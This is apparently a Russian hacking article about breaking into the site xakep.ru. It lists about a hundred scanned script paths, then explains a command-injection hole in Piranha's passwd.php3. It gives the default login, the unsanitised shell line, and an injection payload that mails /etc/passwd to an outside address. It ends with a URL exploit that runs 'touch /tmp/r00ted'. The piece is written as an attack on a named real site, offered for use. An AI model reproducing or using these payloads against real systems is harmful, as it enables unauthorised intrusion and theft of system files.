В этой статье пойдет рассказ о втором по счету взломе сайта http://www.xakep.ru/

Для начала просканим хакер на всякие ошибки

1. /cgi-bin/powerup/r.cgi Ok! info

2. /cgi-bin/powerup/r.pl Ok! info

3. /cgi-local/shop.pl Ok! info

4. /cgi-shop/view_item Ok! info

5. /cgi-bin/common/listrec.pl Ok! info

6. /scripts/shopplus.cgi Ok! info

7. /edit_image.php Ok! info

8. /cgi-bin/sdbsearch.cgi Ok! info

9. /cgi-bin/udirectory.pl Ok! info

10. /cgi-bin/CatalogMgr.pl Ok! info

11. /interscan/cgi-bin/FtpSave.dll Ok! info

12. /interscan/cgi-bin/interscan.dll Ok! info

13. /interscan/cgi-bin/FtpSaveCSP.dll Ok! info

14. /interscan/cgi-bin/FtpSaveCVP.dll Ok! info

15. /ext.dll Ok!

16. /code.php3 Ok! info

17. /dvwssr.dll Ok! info

18. /null.htw 404 info

19. /form-totaller/form-totaller.cgi Ok! info

20. /includes/global.inc Ok! info

21. /foldoc/template.cgi Ok! info

22. /../config/html/cnf_gi.htm Ok! info

23. /../../../scandisk.log 404 info

24. /bb.sqljsp//..//..//..//..//..//../winnt/win.ini 404 info

25. /isapi/tstisapi.dll Ok! info

26. /products/phpPhotoAlbum/explorer.php Ok! info

27. /phpPhotoAlbum/getalbum.php Ok! info

28. /piranha/secure/passwd.php3 Ok! info

29. /wwwboard/passwd.txt Ok! info

30. /roads/cgi/search.pl Ok! info

31. /ROADS/cgi/search.pl Ok! info

32. /server-info Ok! info

33. /server-status Ok! info

34. /caspsamp/codebrws.asp 302 info

35. /technote/technote/print.cgi Ok! info

36. /site/eg/source.asp 302 info

37. /admin.php3 Ok! info

38. /web/bb-hist.sh Ok! info

39. /~wsapi/cfusion Ok! info

40. /Album/ Ok! info

41. /~nobody/etc Ok! info

42. /officescan/cgi/jdkRqNotify.exe 302 info

43. /ultraboard.pl Ok! info

44. /admin-serv/config/adm.conf Ok! info

45. /admin-serv/config/admpw Ok! info

46. /way-board/way-board.cgi Ok! info

47. /opt/netscape/suitespot/admin-serv/config/admpw Ok! info

48. /catalyst/exec/show/config/cr Ok! info

49. /script.cgi Ok! info

50. /form_results.txt Ok! info

51. /sults_Test/testorder.txt Ok! info

52. /orders/results Ok! info

53. /orders.htm Ok! info

54. /onlineor.htm Ok! info

55. /_private/shopping_cart.mdb Ok! info

56. /feedback.txt Ok! info

57. /orderform/orders.txt Ok! info

58. /scripts/cart32/tempfiles.list Ok! info

59. /scripts/tools/getdrvrs.exe 302 info

60. /scripts/wsisa.dll Ok! info

61. /scripts/repost.asp 302 info

62. /cgi-bin/getdoc.cgi Ok! info

63. /cgi-bin/lister Ok! info

64. /cgi-bin/nto Ok! info

65. /cgi-bin/pollit Ok! info

66. /cgi/ Ok! info

67. /cgi/commerce.cgi Ok! info

68. /cgi/cgiproc Ok! info

69. /bin/test.txt Ok! info

70. /cgi-bin/a1stats/a1disp4.cgi Ok! info

71. /cgi-bin/a1stats/a1disp3.cgi Ok! info

72. /cgi-bin/a1stats/a1disp2.cgi Ok! info

73. /cgi-bin/a1stats/a1disp.cgi Ok! info

74. /config.inc Ok! info

75. /quote.html Ok! info

76. /cgi-bin/cal_make.pl Ok! info

77. /cgi-bin/websync.exe 302 info

78. /content.pl Ok! info

79. /cgi-bin/nph-maillist.pl Ok! info

80. /cgi-bin/talkback.cgi Ok! info

81. /cgi-bin/ustorekeeper.pl Ok! info

82. /cgi-bin/anacondaclip.pl Ok! info

83. /cgi-bin/s.cgi Ok! info

84. /cgi-bin/ikonboard/help.cgi Ok! info

85. /cgi-bin/............winntsystem32cmd.exe?/c+dir+c: 404 info

86. /cgi-bin/store.cgi Ok! info

87. /cgi-bin/bbs_forum.cgi Ok! info

88. /cgi-bin/ezshopper3/loadpage.cgi Ok! info

89. /cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report Ok! info

90. /cgi-bin/pals-cgi Ok! info

91. /cgi-bin/sendtemp.pl Ok! info

92. /cgi-bin/replicator/webpage.cgi Ok! info

93. /cgi-bin/webspirs.cgi Ok! info

94. /cgi-bin/auktion.pl Ok! info

95. /cgi-bin/suche/hsx.cgi Ok! info

96. /cgi-bin/hsx.cgi Ok! info

97. /cgi-bin/mailnews.cgi Ok! info

98. /cgi-bin/empower Ok! info

99. /cgi-bin/webdriver Ok! info

100. /cgi-bin/mailview.cgi Ok! info

Теперь расмотрим http://www.xakep.ru/piranha/secure/passwd.php3

piranha - это графический веб интерфейс для мониторинга, конфигурирования и администрирования LVS сектора. Конечно GUI защищен стандартной парой user/pass, но есть аккаунт по умолчанию, который позволит сменить пароли через скрипт passwd.php3

Этот же скрипт имеет дыру позволяющую запускать shell команды. По умолчанию скрипт установлен в директорию

/home/httpd/html/piranha/secure как passwd.php3:

http://victim.com/piranha/secure/passwd.php3

Пароли по умолчанию:

user: piranha

pass: q

После того как скрипт пустит вас внутрь, вывалится форма позволяющая сменить пароль. Она передает новый пароль шелл команде не проверяя на метасимволы:


echo "The passwords you supplied match";

$temp = `/usr/bin/htpasswd -b passwords piranha $try1`;

Это открывает полигон для ввода совершенно новых паролей :-), например:

g23;cat /etc/passwd|mail hacker@hacker.org;

И напоследок эксплоит (требует авторизоваться):

http://victim.com/piranha/secure/passwd.php3?try1=g23 ; touch /tmp/r00ted ;&try2=g23 ; touch /tmp/r00ted ;&passwd=ACCEPT

Вот и всё!!!!!